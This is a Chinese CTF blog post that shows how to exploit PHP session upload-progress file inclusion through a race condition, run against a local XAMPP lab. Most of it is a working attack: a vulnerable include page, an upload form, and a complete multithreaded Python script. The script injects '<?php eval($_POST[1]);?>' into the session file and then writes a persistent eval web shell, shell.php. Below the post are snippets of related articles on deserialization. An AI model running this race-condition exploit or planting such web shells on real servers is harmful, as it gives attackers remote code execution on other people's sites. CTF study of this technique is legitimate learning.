利用条件竞争进行include文件包含和unserialize反序列化渗透,session和Cookie。

于 2023-08-28 13:07:20 发布
阅读量111 收藏
点赞数
分类专栏: ctf web 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_72685284/article/details/132528831
版权

https://www.bilibili.com/video/BV1jh4y1S7hF/?spm_id_from=333.999.0.0&vd_source=80509f9c7811e3d88c646ea500d66f8a视频讲解

原理讲解

这里使用的window下的xampp下进行的。php.ini文件默认在xampp\php\php.ini
php.ini里面有两个关键默认的选项。先认识一下,我门后面用到的时候会进行详细讲解。

  1. session.upload_progress.cleanup = on
  2. session.auto_start=0

默认根目录xampp\htdocs\在这个目录下,我门放一个sess_.php文件

<?php
session_start();
include($_GET[1]);

首次访问,f12查看Cookie,
在这里插入图片描述
此时session存储在xampp\tmp
在这里插入图片描述
而且我们会发现,文件名为sess+PHPSESSID的值。
此时这个文件里面是没有任何内容的。如果我们可以往里面写进去一些东西,比如这样。
在这里插入图片描述

再这样http://192.168.31.204/sess_.php?file=C:\xampp\tmp\sess_r98dmqvlhbnfo3ropres7pb0cm去访问。
就可以弹出计算机了。
可以看出来如果我们想要执行php代码,或者执行系统命令的话。

1.session_start()
2.知道我们session的存储位置。
3.给session里面写入我们的恶意代码。

php.ini有一个选项session.auto_start=0默认是关闭的,但是如果它是打开的,条件1就默认满足了。

在Linux系统中,session文件一般的默认存储位置为 /tmp/var/lib/php/session,假设是默认设置。

而第三个条件就比较复杂了,先改一下配置文件php.ini的选项session.upload_progress.cleanup = on记得要去掉前面的“;”。

cleanup=on表示当文件上传结束后,php将会立即清空对应session文件中的内容。默认设置是off。我们先修改一下看看可以写入什么东西。

先写一个sess_.html

<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.31.204/sess_.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="C0ocr" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>

抓个包,加个Cookie :PHPSESSID=C0ocr123
在这里插入图片描述
此时tmp目录下已经写入,文件名为sess_加上Cookie :PHPSESSID 的值 C0ocr123
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
这个的值是可控的,我们可以把它写成我们的恶意代码。

脚本实现

但是如果session.upload_progress.cleanup = off的值不是off 而是默认的选项on 该怎么办。
这时候就需要条件竞争了。当还没有清空对应session文件中的内容,我们就已经包含了session文件并且执行了里面的恶意代码。

import requests
import io
import threading
sessionid = "C0ocr"
url = 'http://192.168.31.204/sess_.php'
data = {"1":"file_put_contents('C:\\xampp\\htdocs\\ctfshow\\shell.php','<?php eval($_POST[2]);?>');"}

def write(session):

    fileBytes = io.BytesIO(b'a'*1024*50)
    while True:
        response =session.post(
            url,
            data = {
                'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'
            },
            cookies = {
                'PHPSESSID':sessionid
            },
            files = {
                'file':('txt.jpg',fileBytes)
            }
        )

def read(session):

    while True:
        response = session.post(url+'?file=C:\\xampp\\tmp\\sess_'+sessionid,data=data,
                                cookies = {
                                    'PHPSESSID':sessionid
                                })
        response2 = session.get('http://192.168.31.204/shell.php')
        if response2.status_code == 200:
            print("=======done======")
        else:
            print(response2.status_code)
            
if __name__ == '__main__':
    event = threading.Event()
    with requests.session() as session:
        for i in range(1,30):
            threading.Thread(target=write,args=(session,)).start()
        for i in range(1,30):
            threading.Thread(target=read,args=(session,)).start()

    event.set()

shell.php写入成功。
在这里插入图片描述

参考大佬文章。
https://www.freebuf.com/vuls/202819.html

飞鱼 ZE
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PHP 反序列化漏洞
weixin_43801718的博客
10-23 1300
序列化与反序列化 在维基百科中是这样定义的: 序列化是(serialization)在计算机科学的数据处理中,是指将数据结构或对象状态转换为可取用格式(例如存成文件,存于缓存,或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。 概念其实很容易理解,就是将数据转换为一种可逆的存储格式,正向存储为序列化,反向存储就为反序列化。 按照王sir的理解,设想这样一种场景:在双十...
文件包含session条件竞争
qq_64318364的博客
12-04 608
session条件竞争,简单复现
文件包含&条件竞争
qq_63267612的博客
06-26 319
session.upload_progress 与open_basedir、allow_url_fopen、allow_url_include等PHP配置一样,session.upload_progress也是PHP的一个功能,同样可以在php.ini中设置相关属性。其中最重要的几个设置如下:session.upload_progress.enabled可以控制是否开启session.upload_progress功能 session.upload_progress.cleanup可以控制是否在上传之后删除
ctfshow反序列化
wz0819529的博客
10-21 840
web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com ​ */ ​ error_reporting(0); highlight_fi..
tp5源码分析之模板引擎
An丶的博客
02-23 5393
1 模板引擎模板引擎,负责将模板变量填充到模板文件中,默认模板引擎实现在\view\Think.php文件中tp5还支持php文件的模板,其接口与Think模板引擎一致。具体见\view\Php.php文件。$think-&gt;__construct()模板引擎构造函数,创建模板引擎对象public function __construct($config = []) { ...
PHP 序列化和反序列化函数实例详解
12-20
接着,我们使用`unserialize()`函数对已序列化的字符串进行反序列化,将它恢复为原始的数组形式。这个过程是相反的,`unserialize()`读取字符串`$info`,解析其中的类型标识符和数据,然后创建出与原始数组相同的...
php序列化函数serialize() 和 unserialize() 与原生函数对比
10-24
- `serialize()` 和 `unserialize()` 是PHP内建的函数,专门用于PHP内部数据结构的序列化和反序列化,能处理包括数组、对象在内的复杂数据类型,并保留类型信息。 - 序列化的字符串可以用于持久化存储,或者在网络...
weblogic_unserialize_exploit:Java反序列化vul以进行weblogic利用
04-30
程序说明exploit方法来源于Freebuf的”Java反序列化漏洞之weblogic本地利用实现篇”,基于rebeyond大牛的研究和反编译WebLogic_EXP.jar实现的。与rebeyond的方法相比,只提取了WebLogic_EXP.jar中用到的少数几个...
PHP中SERIALIZE和JSON的序列化与反序列化操作区别分析
12-19
回到给定的代码示例,我们看到对于一个简单的对象和数组,无论使用`serialize`还是`json_encode`进行序列化和反序列化,最终结果都是相同的。然而,这只是表面现象。实际上,当涉及到更复杂的数据结构,如带有私有...
unserialize:jQuery 反序列化插件
06-10
反序列化 jQuery 反序列化插件 概述: 这个插件包含两个函数,它们的工作方式与 jQuery 的“serialize()”函数相反。 也就是说,“序列化”采用一种形式(或输入的集合)并为 HTTP 请求返回正确的序列化字符串,此...
PHP之Session原理、Include原理、命名空间、类的加载
生活·代码_这里是青_分享快乐
08-09 324
文章目录一、Session原理二、Include原理三、命名空间(1)、命名空间基础(2)、命名空间子空间★(3)、命名空间的访问★(4)、命名空间的引入(5)、全局空间四、类的加载(1)、手动加载(2)、自动加载autoload★(3)、手动加载spl_autoload_register 为什么起“又忘了”这个标题,今天在开团队周讨论会的时候,一些PHP基础知识原理又记不牢了,想到小学老师经常重复的一句话:好记性不如烂笔头,那就写吧! 一、Session原理 HTTP协议是无状态的,协议对于事务处理没有记
反序列化漏洞详解
热门推荐
LJH1999ZN的博客
03-07 3万+
目录 一、什么是序列化和反序列化 二、什么是反序列化漏洞 三、序列化函数(serialize) 四、反序列化(unserialize) ​五、什么是PHP魔术方法 六、一些常见的魔术方法 七、魔术方法的利用 八、反序列化漏洞的利用 1.__destruct()函数 2.__wakeup() 3.toString() ​九、反序列化漏洞的防御 一、什么是序列化和反序列化 序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串.
java:对象序列化与反序列化(对象信息存储)
include_ice的博客
03-15 544
通俗来说就是将对象的信息保存在文件里.方便传输下面是demo代码先创建一个普通的类.记得要先接上序列化接口,就是Serializable接口 记得重写toString方法,不然打印对象信息时会打印对象信息的内存地址.package encodetest; import java.io.Serializable; public class Student implements Serializa...
Cookiesession的区别,<%@include和jsp:include的区别,forward和sendredirect的区别
kiss_vicente的专栏
09-07 1457
注意cookie有时候禁不掉 Cookie session 存储在客户端 存储在服务器端 两种类型 l 有生命周期 l 无生命周期 两种实现方式 l 依赖于cookie l url重写
JSP数据交互:内置对象sessioninclude指令
qq_41275501的博客
05-23 690
什么是会话?session一词的原义是指有始有终的一系列动作,在实际应用中通常翻译成会话。会话机制是一种服务器端的机制,当用户向服务器发出第一次请求时,服务器会为该用户创建唯一的会话,会话将一直延续到用户访问结束。session对象作为JSP提供的内置对象之一,session对象允许用户访问会话的相关信息,以及绑定数据到会话(在服务器端使用类似于哈希表的结构来保存信息)。绑定到会话的数据可以在多次...
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6297
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
反序列化(Unserialize)漏洞详解
qq_49422880的博客
09-28 1万+
序列化和反序列化漏洞分析   序列化(serialize) 就将对象的状态信息转换为可以存储或传输的形式的过程 在序列化期间,对象将当前的状态写入到临时或持久性的存储区 【将状态信息保存为字符串】。   反序列化(unserialize) 就是把序列化之后的字符串在转化为对象。 其实在序列化的过程中是没有任何的漏洞的,产生漏洞的主要的原因就是在反序列化的过程中,通过我们的恶意篡改会产生魔法函数绕过,字符逃逸,远程命令执行等漏洞,最早发现这些漏洞的大佬是真的牛。 一、简单的魔法函数 魔法函数 调用
什么是php序列化和反序列化
最新发布
05-08
在 PHP 中,序列化是指将一个 PHP 值转化为一个字符串(string)的过程,而反序列化则是将这个字符串还原为原始的 PHP 值。序列化后的字符串可以存储在...因此,在进行反序列化操作时,应该谨慎处理数据来源和内容。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值